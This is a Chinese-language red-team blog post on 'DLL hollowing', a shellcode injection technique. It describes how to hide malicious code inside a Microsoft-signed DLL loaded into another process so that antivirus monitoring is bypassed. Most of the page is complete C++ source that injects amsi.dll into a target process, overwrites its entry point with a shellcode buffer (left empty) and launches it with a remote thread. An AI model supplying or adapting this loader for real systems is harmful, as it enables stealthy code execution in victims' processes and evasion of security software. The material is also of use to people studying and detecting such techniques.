idiotc4t's blog
搜索文档…
GitBook 提供支持
DLL Hollowing
DLL Hollowing

简介

模块镂空(dll hollowing)也是一种shellcode注入技术,原理和思路与process hollowing类似,通过合法的模块信息来伪装恶意代码,虽然我们可以用远程dll注入来完整注入整个恶意dll,但此类注入往往比较容易检测,我们需要往受害者主机上传入一个恶意dll,这样杀毒软件可以通过监控入windows/temp/等目录实现对远程dll注入的拦截,而模块镂空就不会存在这样的风险,因为我们镂空的往往是一个带有微软签名的dll,为了防止进程出错,我们并不能直接镂空一个进程空间中已存在的dll,需要先对目标进程远程注入一个系统合法dll,然后再镂空它,这样我们就获得了一个和windows模块相关联的shellcode环境。

实现思路

    1.
    远程注入一个系统dll(原理参考CreateRemoteThrea的dll注入)
    2.
    获取该模块在目标进程中的虚拟地址
    3.
    定位模块的入口点
    4.
    使用shellcode复写入口点
    5.
    创建远程线程

代码实现

代码参考@mantvydasb
1
#include <iostream>
2
#include <Windows.h>
3
#include <psapi.h>
4
5
char shellcode[] = "";
6
7
int main(int argc, char* argv[])
8
{
9
10
11
TCHAR ModuleName[] = L"C:\\windows\\system32\\amsi.dll";
12
HMODULE hModules[256] = {};
13
SIZE_T hModulesSize = sizeof(hModules);
14
DWORD hModulesSizeNeeded = 0;
15
DWORD moduleNameSize = 0;
16
SIZE_T hModulesCount = 0;
17
CHAR rModuleName[128] = {};
18
HMODULE rModule = NULL;
19
20
// inject a benign DLL into remote process
21
//hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
22
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 2924);
23
24
LPVOID lprBuffer = VirtualAllocEx(hProcess, NULL, sizeof ModuleName, MEM_COMMIT, PAGE_READWRITE);
25
WriteProcessMemory(hProcess, lprBuffer, (LPVOID)ModuleName, sizeof ModuleName, NULL);
26
PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
27
HANDLE dllThread = CreateRemoteThread(hProcess, NULL, 0, threadRoutine, lprBuffer, 0, NULL);
28
WaitForSingleObject(dllThread, 1000);
29
30
// find base address of the injected benign DLL in remote process
31
EnumProcessModules(hProcess, hModules, hModulesSize, &hModulesSizeNeeded);
32
hModulesCount = hModulesSizeNeeded / sizeof(HMODULE);
33
for (size_t i = 0; i < hModulesCount; i++)
34
{
35
rModule = hModules[i];
36
GetModuleBaseNameA(hProcess, rModule, rModuleName, sizeof(rModuleName));
37
if (std::string(rModuleName).compare("amsi.dll") == 0)
38
{
39
break;
40
}
41
}
42
43
// get DLL's AddressOfEntryPoint
44
DWORD headerBufferSize = 0x1000;
45
LPVOID peHeader = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, headerBufferSize);
46
ReadProcessMemory(hProcess, rModule, peHeader, headerBufferSize, NULL);
47
48
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)peHeader;
49
PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)peHeader + dosHeader->e_lfanew);
50
LPVOID dllEntryPoint = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)rModule);
51
52
// write shellcode to DLL's AddressofEntryPoint
53
WriteProcessMemory(hProcess, dllEntryPoint, (LPCVOID)shellcode, sizeof(shellcode), NULL);
54
55
// execute shellcode from inside the benign DLL
56
CreateRemoteThread(hProcess, NULL, 0, (PTHREAD_START_ROUTINE)dllEntryPoint, NULL, 0, NULL);
57
58
return 0;
59
}
Copied!

实现效果

LINKS

Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing
ForrestOrr
What is ired.team?
Red Teaming Techniques & Experiments
最近更新 1yr ago